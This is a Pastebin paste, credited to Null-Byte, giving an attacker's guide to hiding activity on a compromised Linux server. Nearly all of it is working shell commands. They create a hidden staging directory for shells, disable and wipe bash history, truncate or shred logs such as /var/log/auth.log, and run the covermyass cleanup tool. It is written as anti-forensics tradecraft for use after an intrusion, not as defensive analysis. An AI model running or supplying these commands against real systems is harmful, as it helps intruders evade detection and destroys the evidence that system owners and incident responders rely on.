Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ----------------------------------------------------------------------
- _____ _
- ( _ ) _ ( )_
- | (_) | ___ _ ___ _ _ ___ ___ (_)| ,_) _ _
- | _ |/' _ `\ /'_`\ /' _ `\( ) ( )/' _ ` _ `\| || | ( ) ( )
- | | | || ( ) |( (_) )| ( ) || (_) || ( ) ( ) || || |_ | (_) |
- (_) (_)(_) (_)`\___/'(_) (_)`\__, |(_) (_) (_)(_)`\__)`\__, |
- ( )_| | ( )_| |
- `\___/' `\___/'
- A comprehensive guide on how to remove system presence on a
- hacked linux machine / server. Source: Null-Byte
- ----------------------------------------------------------------------
- CREATE SECRET DIRECTORY
- ----------------------------------------------------------------------
- # Depending on privileges, search for all
- # directory(s) you have rights to write to.
- find / -perm -222 -type d 2>/dev/null
- # Find a directory of choice and create a
- # hidden sub-directory inside
- mkdir /dev/shm/.secret
- # To list directory content, use the command:
- ls -l /dev/shm/.secret
- # You can also use the below statement to
- # view the hidden sub-directory(s)
- ls -la /dev/shm/
- # This hidden directory is designed to write code,
- # upload modules, shells, etc. Once finished, you
- # can delete it via...
- rm -rf /dev/shm/.secret
- ----------------------------------------------------------------------
- REMOVE BASH COMMAND HISTORY
- ----------------------------------------------------------------------
- # You can use the 'history' command to view all
- # statements and commands used in the current
- # bash session. History is written to the HISTFILE
- # environment variable, which is usually '.bash_history'
- # By typing...
- echo $HISTFILE
- # ...you can view where it is stored for certain.
- # Type the following statement to purge history:
- unset HISTFILE
- # To confirm history has been overwritten, you can use
- # either of the statements found below:
- HISTFILE=/dev/null
- export HISTFILE=/dev/null
- # You can also set the number of commands to zero
- # by using either of the following statements:
- HISTSIZE=0
- export HISTSIZE=0
- # ...or you can limit the number of lines allowed in the
- # file. Both lines below can be utilized:
- HISTFILESIZE=0
- export HISTFILESIZE=0
- # You may also want to disable history outright. This can be
- # suspicious but is an alternative.
- set +o history
- # You can re-enable with the following command:
- set -o history
- # Additionally, you can use the 'shopt' command to enable/disable:
- Disable: shopt -ou history
- Enable: shopt -os history
- # To clear the history, you can input:
- history -c
- # ...then to write changes to disk, enter:
- history -w
- # The 'history -c' will only be affective for the current
- # session. To make sure history is cleared completely when
- # exiting shell, input:
- cat /dev/null > ~/.bash_history && history -c && exit
- # The 'kill' command will allow you to exit shell without
- # saving history also. Input as follows:
- kill -9 $$
- ----------------------------------------------------------------------
- CLEARING LOG FILES
- ----------------------------------------------------------------------
- # There are various system logs stored in linux systems.
- # Here are some of the following...
- # /var/log/auth.log Authentication
- # /var/log/cron.log Cron Jobs
- # /var/log/maillog Mail
- # /var/log/httpd Apache
- # You can remove a log w/ the 'rm' command. This however
- # will likely raise suspicion. The more favorable choice is
- # to clear the log without deleting the log file:
- truncate -s 0 /var/log/<YOUR_LOG>
- # Truncate is not always available on systems. If not, the
- # same result can be accomplished by entering in any of the
- # command statements below:
- echo '' > /var/log/<YOUR_LOG>
- > /var/log/<YOUR_LOG>
- shred /var/log/<YOUR_LOG>
- shred -zu /var/log/<YOUR_LOG>
- cat /dev/null > /var/log/<YOUR_LOG>
- true | tee /var/log/<YOUR_LOG>
- dd if=/dev/null of=/var/log/<YOUR_LOG>
- ----------------------------------------------------------------------
- AUTOMATION OF PRESENCE REMOVAL
- ----------------------------------------------------------------------
- # To make secure deletion and removal of system presence, you
- # are able to use CoverMyAss at: github.com/sundowndev/covermyass
- # It utilizes 'wget' and will work as long as there's internet access.
- # Find a writable direcotry, the use 'chmod' to make it executable:
- chmod +x covermyass
- # ...then execute it:
- ./covermyass
- # In case of needing a quick exit, enter in:
- ./covermyass now
- ----------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement